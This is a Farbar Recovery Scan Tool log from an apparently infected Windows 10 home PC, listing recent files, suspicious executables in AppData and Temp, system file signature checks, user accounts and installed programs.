2019-01-09 12:58 - 2019-01-01 08:12 - 000713272 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 08:12 - 000128824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2019-01-09 12:58 - 2019-01-01 08:12 - 000043536 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserexport.exe
2019-01-09 12:58 - 2019-01-01 07:48 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wanarp.sys
2019-01-09 12:58 - 2019-01-01 07:48 - 000079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Print.Workflow.Source.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-01-09 12:58 - 2019-01-01 07:46 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2019-01-09 12:58 - 2019-01-01 07:45 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:44 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:41 - 000895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000880048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000581808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVideoDSP.dll
2019-01-09 12:58 - 2019-01-01 07:37 - 000381240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2019-01-09 12:58 - 2019-01-01 07:17 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MicrosoftAccountTokenProvider.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-01-09 12:58 - 2019-01-01 07:16 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-01-09 12:58 - 2019-01-01 07:15 - 000317440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-01-09 12:58 - 2019-01-01 07:14 - 000330752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.Workflow.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000594432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2019-01-09 12:58 - 2019-01-01 07:13 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 001036288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2019-01-09 12:58 - 2019-01-01 07:12 - 000516608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2019-01-09 12:58 - 2019-01-01 06:23 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-01-09 11:06 - 2019-01-09 11:06 - 000031454 _____ C:\Users\ulol\Desktop\The Big Bang Theory - 12x11 - The Paintball Scattering.SVA.English.HI.C.orig.Addic7ed.com.srt
2019-01-07 22:58 - 2019-01-07 22:58 - 000076780 _____ C:\ProgramData\agent.update.1546898284.bdinstall.v2.bin
2019-01-07 21:28 - 2019-01-07 21:37 - 168596427 _____ C:\Users\ulol\Desktop\The.Big.Bang.Theory.S12E11.HDTV.x264-SVA[eztv].mkv
2019-01-07 20:50 - 2018-10-04 22:40 - 000359584 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\Gemma.sys
2019-01-07 20:47 - 2019-01-09 19:03 - 000000000 ____D C:\Program Files\Bitdefender Antivirus Free
2019-01-07 19:45 - 2019-01-11 14:41 - 000000000 ____D C:\ProgramData\Bitdefender
2019-01-07 19:45 - 2018-10-09 14:07 - 000294000 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:\WINDOWS\system32\Drivers\edrsensor.sys
2019-01-07 19:44 - 2018-08-22 11:43 - 000357768 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bddci.sys
2019-01-07 19:41 - 2019-01-07 19:41 - 000000000 ____D C:\Users\ulol\AppData\Roaming\QuickScan
2019-01-07 19:36 - 2019-01-07 19:36 - 000103988 _____ C:\ProgramData\agent.1546886203.bdinstall.v2.bin
2019-01-07 19:36 - 2019-01-07 19:36 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2019-01-07 19:34 - 2019-01-07 19:34 - 000000085 _____ C:\WINDOWS\wininit.ini
2019-01-07 19:24 - 2019-01-07 20:33 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-01-07 19:24 - 2019-01-07 19:34 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2019-01-07 19:24 - 2019-01-07 19:24 - 000000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2019-01-02 20:51 - 2019-01-02 21:35 - 788517376 _____ C:\Users\ulol\Downloads\Skryta-identita-2006-DVDRip-cz-DABING.avi
2019-01-01 22:49 - 2019-01-01 23:30 - 734048256 _____ C:\Users\ulol\Downloads\Ja Robot - I, Robot (2004) cz dabing.avi
2018-12-25 12:28 - 2018-12-25 14:18 - 1998800896 _____ C:\Users\ulol\Downloads\The-Shining---Osvícení---horor-(1980)-cz.titulky-OD-SOUČKA-TOMÁŠE.avi
2018-12-25 12:22 - 2018-12-25 14:03 - 1109600935 _____ C:\Users\ulol\Downloads\Motýlek (Papillon) 1973(S.McQueen D.Hoffman) bombuj.mp4
2018-12-20 14:07 - 2018-12-14 08:25 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2018-12-20 14:07 - 2018-12-14 07:55 - 003396608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2018-12-20 14:07 - 2018-12-14 07:54 - 006032384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2018-12-20 14:07 - 2018-12-14 07:52 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2018-12-20 14:06 - 2018-12-14 08:29 - 001130760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 001457240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001257672 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2018-12-20 14:06 - 2018-12-14 08:21 - 001140480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2018-12-20 14:06 - 2018-12-14 08:21 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2018-12-20 14:06 - 2018-12-14 08:21 - 000982912 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2018-12-20 14:06 - 2018-12-14 08:10 - 001295360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 08:07 - 000669696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2018-12-20 14:06 - 2018-12-14 07:55 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2018-12-20 14:06 - 2018-12-14 07:54 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2018-12-20 14:06 - 2018-12-14 07:52 - 002173440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2018-12-20 14:06 - 2018-12-14 07:51 - 001551360 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2018-12-20 14:06 - 2018-12-14 07:50 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2018-12-13 19:20 - 2019-01-11 23:34 - 000730616 _____ C:\WINDOWS\system32\perfh007.dat
2018-12-13 19:20 - 2019-01-11 23:34 - 000149266 _____ C:\WINDOWS\system32\perfc007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000306166 _____ C:\WINDOWS\system32\perfi007.dat
2018-12-13 19:20 - 2018-12-12 19:23 - 000040520 _____ C:\WINDOWS\system32\perfd007.dat
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\SysWOW64\de
2018-12-13 19:14 - 2018-12-13 19:14 - 000000000 ____D C:\WINDOWS\system32\de
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-01-12 00:19 - 2018-04-11 22:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-01-12 00:18 - 2018-05-21 21:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-01-12 00:03 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-01-12 00:02 - 2018-05-21 20:39 - 000000000 ____D C:\Users\ulol
2019-01-11 23:34 - 2018-05-21 20:39 - 002569078 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-01-11 23:34 - 2018-04-12 16:50 - 000716276 _____ C:\WINDOWS\system32\perfh005.dat
2019-01-11 23:34 - 2018-04-12 16:50 - 000144534 _____ C:\WINDOWS\system32\perfc005.dat
2019-01-11 23:34 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF
2019-01-11 23:13 - 2018-05-21 20:32 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-01-11 22:43 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\NDF
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-01-11 18:07 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-01-11 14:35 - 2017-12-19 23:57 - 000000000 ____D C:\Users\ulol\AppData\Local\Packages
2019-01-11 13:31 - 2017-02-01 18:08 - 000000000 ___HD C:\$SysReset
2019-01-11 12:32 - 2017-02-01 23:40 - 000000000 ____D C:\Users\ulol\.smplayer
2019-01-11 11:55 - 2017-02-13 11:53 - 000000000 ____D C:\Users\ulol\AppData\Roaming\vlc
2019-01-10 17:14 - 2017-10-18 10:44 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-01-09 19:09 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-01-09 18:25 - 2018-12-07 17:47 - 000000000 ____D C:\Users\ulol\Downloads\vikings s05
2019-01-09 13:11 - 2017-02-01 23:48 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-01-09 13:08 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-01-09 13:08 - 2017-02-01 23:48 - 132790320 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-01-03 18:04 - 2017-02-01 23:43 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-01-02 20:41 - 2018-11-15 17:52 - 000835480 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2019-01-02 20:41 - 2018-11-15 17:52 - 000179600 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-12-27 15:49 - 2018-11-21 19:19 - 000000000 ____D C:\Users\ulol\Downloads\Outlaw King (2018) 720p WEBRip x264 750MB (nItRo)-XpoZ
2018-12-25 12:15 - 2018-09-27 08:38 - 000000000 ____D C:\Users\ulol\Downloads\South.Park.S22
2018-12-23 15:52 - 2018-10-15 12:32 - 000000000 ____D C:\WINDOWS\Minidump
2018-12-22 09:09 - 2018-04-11 16:08 - 000000000 ____D C:\Users\ulol\AppData\Local\WiFi Guard
2018-12-21 10:17 - 2017-02-01 21:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2018-12-18 11:27 - 2017-02-01 21:40 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\en-GB
2018-12-15 12:56 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\en-GB
2018-12-13 20:15 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-12-13 20:06 - 2017-12-20 12:46 - 000000000 ___RD C:\Users\ulol\3D Objects
2018-12-13 20:06 - 2017-02-01 21:29 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-12-13 19:20 - 2018-05-21 20:31 - 000401184 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-12-13 19:15 - 2018-04-12 16:51 - 000000000 ____D C:\WINDOWS\OCR
2018-12-13 19:14 - 2018-05-20 21:45 - 000000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\winrm
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\WCN
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\slmgr
2018-12-13 19:14 - 2018-04-12 16:50 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\F12
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\dsc
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\SysWOW64\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MUI
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\migwiz
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\com
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\IME
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\Help
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files\Common Files\system
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-12-13 19:14 - 2018-04-12 00:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-12-13 19:14 - 2018-04-11 22:04 - 000000000 ____D C:\WINDOWS\servicing
2018-12-13 19:13 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\ShellComponents
2018-12-13 12:03 - 2017-02-01 21:49 - 000000000 ____D C:\Users\ulol\Desktop\cool
2018-12-13 09:09 - 2018-05-22 10:32 - 000000000 ____D C:\Users\ulol\AppData\Local\PlaceholderTileLogoFolder
==================== Files in the root of some directories =======
2019-01-10 17:29 - 2019-01-10 17:29 - 000000004 _____ () C:\ProgramData\ext.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000004 _____ () C:\ProgramData\lock.dat
2019-01-10 17:46 - 2019-01-10 17:46 - 000000008 _____ () C:\ProgramData\ts.dat
2017-09-26 07:46 - 2016-08-07 17:04 - 000000422 _____ () C:\Program Files (x86)\update-RiseTombRider.bat
2017-09-26 07:46 - 2013-10-13 06:47 - 000000732 _____ () C:\Program Files (x86)\visit-
www.nosteam.ro.html
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe
2019-01-11 11:20 - 2019-01-11 11:20 - 006161408 _____ () C:\Users\ulol\AppData\Local\dump007.dat
2017-08-29 16:47 - 2017-08-29 16:47 - 000008963 _____ () C:\Users\ulol\AppData\Local\recently-used.xbel
2019-01-11 23:01 - 2019-01-11 23:02 - 000007593 _____ () C:\Users\ulol\AppData\Local\Resmon.ResmonCfg
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
2019-01-10 17:29 - 2019-01-10 17:29 - 000000003 _____ () C:\Users\ulol\AppData\Local\wbem.ini
Some files in TEMP:
====================
2019-01-10 18:14 - 2019-01-12 00:06 - 000000000 ____D () C:\Users\ulol\AppData\Local\Temp\IE8Shims.dll
2019-01-10 17:29 - 2019-01-10 17:29 - 013205167 _____ (MAL ) C:\Users\ulol\AppData\Local\Temp\neyparstfp3.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2018-05-21 20:31
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 00:03:25)
Running from C:\Users\ulol\Desktop
Windows 10 Home Version 1803 17134.523 (X64) (2018-05-21 20:07:15)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-195099987-321758953-278711717-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-195099987-321758953-278711717-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-195099987-321758953-278711717-1000 - Limited - Disabled) => C:\Users\defaultuser0
Guest (S-1-5-21-195099987-321758953-278711717-501 - Limited - Disabled)
Martin (S-1-5-21-195099987-321758953-278711717-1001 - Administrator - Enabled) => C:\Users\ulol
WDAGUtilityAccount (S-1-5-21-195099987-321758953-278711717-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.320.8504 - BlueStack Systems, Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{CBABB5FD-BD69-8969-729A-5659E11D9518}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{98527BF3-A8E0-B8CF-7297-436B714FC576}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{487C3865-3005-F04A-FBA4-F4239E02A847}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{746E086C-023A-A79C-DBE1-062E773FF6C8}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}) (Version: 2016.0226.1531.27895 - Advanced Micro Devices, Inc.) Hidden
Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden
GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HiSuite (HKLM-x32\...\Hi Suite) (Version: 9.0.2.301 - Huawei Technologies Co.,Ltd)
HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.0.295 - SurfRight B.V.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4653 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
Kingdom Come Deliverance (HKLM-x32\...\Kingdom Come Deliverance_is1) (Version: - )
Malwarebytes verze 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
Microsoft Office 365 ProPlus - cs-cz (HKLM\...\O365ProPlusRetail - cs-cz) (Version: 16.0.9126.2336 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-195099987-321758953-278711717-1001\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{d98165f5-8b37-4100-8852-a0664374ff8a}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MKVToolNix 9.8.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 9.8.0 - Moritz Bunkus)
